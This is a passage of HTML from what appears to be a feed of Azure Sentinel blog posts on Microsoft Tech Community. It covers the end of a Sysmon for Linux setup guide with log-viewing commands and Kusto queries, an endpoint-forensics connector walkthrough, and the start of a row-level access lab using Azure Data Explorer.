data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;log.</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">tail –f /var/log/Syslog</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_9-1634229152043.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317403i1F1B0DF4472A998D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_9-1634229152043.png" alt="Cyb3rWard0g_9-1634229152043.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Explore Sysmon Events&nbsp;via&nbsp;sysmonLogView</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">Sysmon also comes with a binary named&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">sysmonLogView</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;to explore sysmon events in a friendly format.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_10-1634229152094.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317405i17846EDADA3116D1/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_10-1634229152094.png" alt="Cyb3rWard0g_10-1634229152094.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_11-1634229152083.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317404iD7E431E932169DBA/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_11-1634229152083.png" alt="Cyb3rWard0g_11-1634229152083.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Run the following commands to explore&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Sysmon&nbsp;event id 1 (ProcessCreate)</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;events locally:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux-sysmon-tail-sysmonlogview.png" style="width: 940px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317436i8FE92F43AA410997/image-size/large?v=v2&amp;px=999" role="button" title="linux-sysmon-tail-sysmonlogview.png" alt="linux-sysmon-tail-sysmonlogview.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><FONT size="5"><SPAN data-contrast="none">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H3> <P><SPAN data-contrast="auto">Check if you are getting Syslog events via the Azure Sentinel interface:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="14" aria-setsize="-1" data-aria-posinset="18" data-aria-level="1"><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://portal.azure.com/</SPAN></A><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="14" aria-setsize="-1" data-aria-posinset="19" data-aria-level="1"><SPAN data-contrast="auto">Search &gt; Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sysmon-azure-sentinel.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317442iC2315774403A05F8/image-size/large?v=v2&amp;px=999" role="button" title="sysmon-azure-sentinel.png" alt="sysmon-azure-sentinel.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Next, click on&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">logs</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;and run the following&nbsp;Kusto&nbsp;query to see if all your endpoints are generating events and are being collected by the Azure Log Analytics agent:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">Syslog | summarize count() by Computer</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="sysmon-azure-sentinel-query.png" style="width: 824px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317444iB0EB18AE4C1A1BD0/image-size/large?v=v2&amp;px=999" role="button" title="sysmon-azure-sentinel-query.png" alt="sysmon-azure-sentinel-query.png" /></span></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Querying Sysmon for Linux</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">You can query Sysmon for Linux logs by using the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Syslog</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;table with the following Kusto query:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">Syslog | extend EventID = parse_xml(SyslogMessage).Event.System.EventID | extend EventData = parse_xml(SyslogMessage).Event.EventData.Data | mv-expand bagexpansion=array EventData | evaluate bag_unpack(EventData) | extend Key=tostring(['@Name']), Value=['#text'] | evaluate pivot( Key, any(Value), TimeGenerated, TenantId, SourceSystem, EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId ) | summarize count() by tostring(EventID)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Additionally, as part of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">ASIM</SPAN></A><SPAN data-contrast="auto">&nbsp;(Azure Sentinel Information Model) project, we have created parsers for&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sysmon&nbsp;for&nbsp;Linux</SPAN></A><SPAN data-contrast="auto">.&nbsp;The parsers get imported automatically by the template we use to deploy the lab environment. Therefore, you can simply use the&nbsp;parsers&nbsp;available&nbsp;under&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">Functions &gt; Workspace functions</SPAN></STRONG><SPAN data-contrast="auto">:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="basic">vimProcessCreateLinuxSysmon | limit 10 </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="linux-sysmon-azure-sentinel.png" style="width: 808px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/317446i333963A050022498/image-size/large?v=v2&amp;px=999" role="button" title="linux-sysmon-azure-sentinel.png" alt="linux-sysmon-azure-sentinel.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">That’s it! You are now ready to use Sysmon for Linux in a lab environment for research and development of detections&nbsp;</SPAN><SPAN data-contrast="auto">;)</img></SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Sysmon for Linux&nbsp;Resources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="21" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel/Parsers/ASim Sysmon for Linux at master · Azure/Azure-Sentinel (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="22" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/Sysmon-For-Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">Sysinternals/SysinternalsEBPF: The Linux port of the Sysinternals Sysmon tool. (github.com)</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank" rel="noopener">Sysinternals/SysmonForLinux (github.com)</A></SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="17" aria-setsize="-1" data-aria-posinset="23" data-aria-level="1"><SPAN data-contrast="none"><A href="#" target="_blank">MSTIC-Sysmon/linux/configs at main · microsoft/MSTIC-Sysmon (github.com)</A></SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">References</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="24" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">eBPF - Introduction, Tutorials &amp; Community Resources</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="25" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What is eBPF? An Introduction and Deep Dive into the eBPF Technology</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="26" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OTRF/Azure-Sentinel2Go: Azure Sentinel2Go is an open source project developed to expedite the deployment of an Azure Sentinel lab. (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="21" aria-setsize="-1" data-aria-posinset="27" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel To-Go! A Linux :penguin:</img> Lab with AUOMS Set Up to Learn About the OMI Vulnerability :collision:</img> - Microsoft Tech Community</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Sat, 16 Oct 2021 02:10:00 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/automating-the-deployment-of-sysmon-for-linux-and-azure-sentinel/ba-p/2847054 Cyb3rWard0g 2021-10-16T02:10:00Z Analyzing Endpoints Forensics - Azure Sentinel Connector https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/analyzing-endpoints-forensics-azure-sentinel-connector/ba-p/2820973 <P><STRONG>Overview &amp; Use Case</STRONG></P> <P>&nbsp;</P> <P>Thanks to&nbsp;<LI-USER uid="1129204"></LI-USER>&nbsp;,&nbsp;<LI-USER uid="490170"></LI-USER> &amp;&nbsp;<LI-USER uid="858693"></LI-USER> for the brainstorming, technical contributing, and proof reading!</P> <P>&nbsp;</P> <P><SPAN>The field of Endpoint forensics seeks to help investigators reconstruct what happened during an endpoint intrusion. Did an attacker break in because of a missing definition / signature / policy / setting or a configuration, and if so, how? What havoc did the attacker wreak after breaking in? Tools that help investigators answer these types of questions are still quite primitive and are often hindered by incomplete or incorrect information. Analyzing Endpoints Forensics - Azure Sentinel Connector can enable more-powerful forensic analysis through techniques such as streaming a computer’s EPP (Endpoint Protection) health status, policies, settings, and configuration in addition to IoT vulnerable assets, data events &amp; vulnerabilities.</SPAN></P> <P>&nbsp;</P> <P><SPAN>Devices (IT/OT)&nbsp;</SPAN><SPAN class="hiddenGrammarError">health</SPAN><SPAN>&nbsp;state and security configurations policies and settings (Microsoft Defender for Endpoint &amp; Azure Defender for IoT) are critical to SOC&nbsp;</SPAN><SPAN class="hiddenGrammarError">team</SPAN><SPAN>&nbsp;helping them to address the following use&nbsp;</SPAN><SPAN>cases:</SPAN></P> <P>&nbsp;</P> <UL> <LI>Identifying onboarded devices and their health status</LI> <LI>Activity and a security posture for IT/OT assets</LI> <LI>Viewing the compliance status of the devices based on the security recommendations</LI> <LI>Identifying devices vulnerabilities and hence provide a triage – matrix remediation framework</LI> </UL> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Implementation</STRONG></P> <P>&nbsp;</P> <P><STRONG>Step(1): Prep, App Registration &amp; Azure Defender for IoT Key</STRONG></P> <UL> <LI>Log in to Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Search for App Registration &gt; New Registration</LI> <LI>Type Name, ensure of selecting the right "supported account type” then click Register button</LI> <LI>Define and consent the below API permissions as shown below:</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="HeshamSaad_0-1633590871729.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315812iE8B6CA94DB1140C4/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_0-1633590871729.png" alt="HeshamSaad_0-1633590871729.png" /></span></P> <P>&nbsp;</P> <UL> <LI>Get the following values:</LI> <UL> <LI>Application / Client ID</LI> <LI>Tenant ID</LI> <LI>Secret</LI> <LI>Azure Active Directory Domain</LI> </UL> </UL> <UL> <LI>Log in to the Azure Defender for IoT central manager console, System Settings &gt; Access Tokens</LI> <LI>Select Generate new token, describe the purpose of the new token, and select</LI> <LI>Copy the token, save it, and select finish</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="HeshamSaad_1-1633590871905.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315813i323ED49533CC7388/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_1-1633590871905.png" alt="HeshamSaad_1-1633590871905.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Step(2): Microsoft Devices Forensics Custom Connector</STRONG></P> <UL> <LI>Log in to Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Go to Azure Sentinel &gt; Automation</LI> <LI>Create a new blank Playbook and follow the below Gif, the code being uploaded to&nbsp;<U><A href="#" target="_self">github repo&nbsp;</A></U>as well:</LI> <UL> <LI>Initialize set of parameters:</LI> <UL> <LI>Name: AD4IoTKey</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;Azure Defender for IoT Key value been generated at the prep step&gt;</LI> </UL> <LI>Name: Application ID</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration ID value been generated at the prep step&gt;</LI> </UL> <LI>Name: Secret</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration Secret value been generated at the prep step&gt;, it’s recommended to use Key vault</LI> </UL> <LI>Name: Tenant ID</LI> <UL> <LI>Type: String</LI> <LI>Default Value: &lt;App registration Tenant ID value&gt;</LI> </UL> </UL> <LI>Set a recurrence step to trigger and execute the playbook</LI> <LI>Set an HTTP endpoints to query and fetch Microsoft Defender for Endpoint Windows required logs “MDE Hunting Query Agent Health Windows - TVM”, ensure the authorization type is Active Directory OAuth</LI> <LI>Parse content-types data via Json</LI> <LI>Iterate (For-each) on all returned values (Body) &nbsp;as Microsoft Defender for Endpoint Windows iterations data then send the data to Azure Sentinel Log analytics workspace via a custom log table (AgentHealthStatusWindows)</LI> <LI>Repeat the above steps to cover MacOS and store the data at (MDE_MAC_devicehealth) custom log tables, you can easily do the same and cover Linux and other supported OSs platforms.</LI> <LI>Also repeat the above steps to cover Azure Defender for IoT:</LI> <UL> <LI>Devices</LI> <LI>Events</LI> <LI>CVEs</LI> </UL> </UL> </UL> <P><STRONG>&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315819i53E37F4846F652EF/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics1.gif" alt="ITOTForensics1.gif" /></span></STRONG></P> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315820iA50ACB44BFA2E9D0/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics2.gif" alt="ITOTForensics2.gif" /></span></STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Step(3): Microsoft Devices Forensics Workbook &amp; Hunting</STRONG></P> <P><STRONG>&nbsp;</STRONG></P> <UL> <LI>Log in to Azure tenant,&nbsp;<A href="#" target="_blank" rel="noopener">http://portal.azure.com</A></LI> <LI>Go to Azure Sentinel &gt; Automation</LI> <LI>Create new workbook (Add workbook)</LI> <LI>Click on Edit &gt; Advanced Editor (icon)</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="HeshamSaad_3-1633590872309.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315815i705E63F305F804A1/image-size/large?v=v2&amp;px=999" role="button" title="HeshamSaad_3-1633590872309.png" alt="HeshamSaad_3-1633590872309.png" /></span></P> <P>&nbsp;</P> <UL> <LI>Copy and paste the workbook json code uploaded to <A href="#" target="_self">github repo</A>, click done editing and save</LI> </UL> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ITOTForensics3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/315821i8ED183736CC1547E/image-size/large?v=v2&amp;px=999" role="button" title="ITOTForensics3.gif" alt="ITOTForensics3.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Notes &amp; Consideration</STRONG></P> <P>&nbsp;</P> <UL> <LI>You can customize the parsers at the connector's flow with the required and needed attributed / fields based on your schema / payload before the ingestion process, also you can create custom Azure Functions once the data being ingested to Azure Sentinel</LI> <LI>Azure Function can be used&nbsp;to create the custom connector as well</LI> <LI>Couple of points to be considered while using Logic Apps:</LI> <UL> <LI>Cost (<A href="#" target="_blank" rel="noopener">standard / enterprise connectors</A>)</LI> <LI><A href="#" target="_blank" rel="noopener">Considerations &amp; Configurations</A></LI> <LI>Nonstandard schema</LI> <LI>Rewriting rules</LI> </UL> </UL> <P>&nbsp;</P> <P><STRONG>Get started today!</STRONG></P> <P>&nbsp;</P> <P>We encourage you to try it now!</P> <P>You can also contribute new connectors, workbooks, analytics and more in Azure Sentinel. Get started now by joining the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters GitHub community</A>.</P> Sun, 10 Oct 2021 08:55:27 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/analyzing-endpoints-forensics-azure-sentinel-connector/ba-p/2820973 Hesham Saad 2021-10-10T08:55:27Z Simple Row-Based Access Workbook: Lab Walk-Through with Azure Sentinel and Azure Data Explorer (ADX) https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/simple-row-based-access-workbook-lab-walk-through-with-azure/ba-p/2804446 <P>In manufacturing, healthcare, and other industries, individuals and security groups need high visibility reporting on their data to enable quick decision-making. This can eliminate unnecessary downtime or solve potential operational problems in isolated locations. Additionally, restricting unnecessary visibility to data across facilities is best practice for zero trust operations.</P> <P>&nbsp;</P> <P>The SOC, however, benefits from data analysis across the entirety of data within their global estate. How then, can we avoid duplicating data and deliver to each operational group the exact level of access they need? Responsible information security requires Availability, Integrity and Confidentiality. Azure Sentinel, as part of the rich ecosystem of Azure, with built-in tools for maintaining comprehensive security, allows for flexibility in addressing data access needs, securely.&nbsp;</P> <P>&nbsp;</P> <P>We're able to use Azure Sentinel to allow SOC analysts access to a broad range of data for threat detection and remediation activities while, through portions of the same data set, allowing facility or data owners visibility to quickly eliminate or mitigate unforeseen operational issues and downtime.&nbsp;Although Azure Sentinel allows <A href="#" target="_blank" rel="noopener">resource-context RBAC</A>, some organizations may desire more granular access controls. Azure Data Explorer (ADX) allows granularity of control down to the row level using built-in functions.</P> <P>&nbsp;</P> <P>In this blog post, we will walk through how to create a sample row-level access-based &nbsp;workbook, which can be extended for Enterprise use with solutions such as <A href="#" target="_blank" rel="noopener">Azure Data Factory</A> (ADF). A benefit of using ADF as a data pipeline into ADX is that it allows you to mask and remove data in transit. This may be useful if you only need to preserve a subset of data for forensics or investigation purposes, or if you need to mask sensitive data for any reason.&nbsp;For this sample, we will not be using ADF, but look out for a follow up blog!</P> <P>&nbsp;</P> <P>Let's start with a few assumptions for this lab:</P> <UL> <LI>We have a set of resources connected to IPs associated with each facility.</LI> <LI>Facility owners should have full access to connection and log details belonging to assets only within their facility ownership responsibilities.</LI> <LI>Resources, networks, assets and changes are tracked within a Central Management Database (CMDB).</LI> <LI>This CMDB is relatively static, so it doesn't make sense to ingest it into Azure Sentinel/Log Analytics, however, it is important to be able to reference against the logs that are flowing into Azure Sentinel, which the SOC uses for it's operations.</LI> </UL> <P>Now let's try it!</P> <H5>&nbsp;</H5> <P>&nbsp;</P> <H3><STRONG><U>Create Security Groups</U></STRONG></H3> <P>The first step we will take to ensure easy management of access control is to set up Security Groups in Azure AD aligning to each facility's permissions.&nbsp;Add users, as required, to each Security Group. For the SOC, you'll create or use a group that contains all SOC analysts that need access across all facilities (not shown below).</P> <P>&nbsp;</P> <P>You'll see in the image below that these users can be B2B users as well as employees:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633125941252.png" style="width: 948px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314495iC94E6C83F1836647/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633125941252.png" alt="Beth_Bischoff_0-1633125941252.png" /></span></P> <H3>&nbsp;</H3> <H3><STRONG><U>Create an Azure Data Explorer cluster and</U></STRONG><STRONG><U>&nbsp;ingest data</U></STRONG></H3> <P><SPAN style="font-family: inherit;">The next step for our sample, is to create a new Azure Data Explorer (ADX) cluster by searching for this PaaS service in your Azure Portal and adding a database:</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633125978561.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314496i7E5E837DF0AD11EA/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633125978561.png" alt="Beth_Bischoff_1-1633125978561.png" /></span></P> <P>&nbsp;</P> <P>Read permissions <EM><U>do</U></EM> need to be specifically granted to the Resource Group in which the ADX cluster resides, as well as to the cluster and database, so you'll want to use the Access Control (IAM) settings and permissions to grant this permission to all users who will need partial access to the data.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Beth_Bischoff_2-1633126020454.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314497i6C140807AADA794F/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_2-1633126020454.png" alt="Beth_Bischoff_2-1633126020454.png" /></span><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Beth_Bischoff_0-1633204685659.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314596iFAE03AA32E7E09D6/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633204685659.png" alt="Beth_Bischoff_0-1633204685659.png" /></span></P> <P>&nbsp;</P> <P>The first step within the ADX cluster database will be to open the Query Editor and Run the ".create table" command to define your table schema. This should align to the fields of the Database to which you will be granting restricted and full access.</P> <P>&nbsp;</P> <P>For our example, we'll use a CSV file to make this quick and easy, so if you'd like to follow along, you can use this command inside the "Query" window of the ADX Database, then click:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="Beth_Bischoff_0-1633197802549.png" style="width: 52px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314588i3E076EB759A84997/image-dimensions/52x32?v=v2" width="52" height="32" role="button" title="Beth_Bischoff_0-1633197802549.png" alt="Beth_Bischoff_0-1633197802549.png" /></span></P> <P style="margin: 0in;"><SPAN style="font-size: 11.0pt; font-family: 'Calibri',sans-serif;">:</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">.create table CMDBData (Geo: string, Geo_Delivery_Lead: string, Description: string, Hostname: string, Location: string, IPAddress: string, Network_Desc: string, Plant_Owner: string, site: string)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Here, your table will be created with empty columns, which will be filled in a minute with an uploaded CSV file:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_1-1633198003211.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314590i4E7DF25E7A885958/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_1-1633198003211.png" alt="Beth_Bischoff_1-1633198003211.png" /></span></P> <P>&nbsp;</P> <P>For the CSV file, we've whipped up some fake data, enough to prove the solution works and see this at a glance later on. Note that the column names and types align with the table fields that you've created above.</P> <P style="margin: 0in;">&nbsp;</P> <TABLE border="1" width="99.90375360923967%"> <TBODY> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt; width: 48pt;">Geo</TD> <TD width="13.763233878729547%" height="14px" style="width: 48pt;">Geo_Delivery_Lead</TD> <TD width="13.089509143407122%" height="14px" style="width: 48pt;">Description</TD> <TD width="13.282001924927817%" height="14px" style="width: 48pt;">Hostname</TD> <TD width="6.833493743984601%" height="14px" style="width: 48pt;">Location</TD> <TD width="10.39461020211742%" height="14px" style="width: 48pt;">IPAddress</TD> <TD width="10.68334937439846%" height="14px" style="width: 48pt;">Network_Desc</TD> <TD width="17.805582290664102%" height="14px" style="width: 48pt;">Plant_Owner</TD> <TD width="4.716073147256978%" height="14px" style="width: 48pt;">site</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI224</TD> <TD width="13.763233878729547%" height="14px">Scott</TD> <TD width="13.089509143407122%" height="14px">DC</TD> <TD width="13.282001924927817%" height="14px">DC.domain</TD> <TD width="6.833493743984601%" height="14px">22 Bldg</TD> <TD width="10.39461020211742%" height="14px">172.16.16.100</TD> <TD width="10.68334937439846%" height="14px">PCN-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI225</TD> <TD width="13.763233878729547%" height="14px">Sally</TD> <TD width="13.089509143407122%" height="14px">DMZ Workstation</TD> <TD width="13.282001924927817%" height="14px">DMZ_Workstation</TD> <TD width="6.833493743984601%" height="14px">22 Lab</TD> <TD width="10.39461020211742%" height="14px">172.16.1.4</TD> <TD width="10.68334937439846%" height="14px">PIN-2</TD> <TD width="17.805582290664102%" height="14px">{userA@domain.com}&nbsp;</TD> <TD width="4.716073147256978%" height="14px">MI22</TD> </TR> <TR style="height: 14.5pt;"> <TD width="9.33589990375361%" height="14px" style="height: 14.5pt;">MFG_MI226</TD> <TD 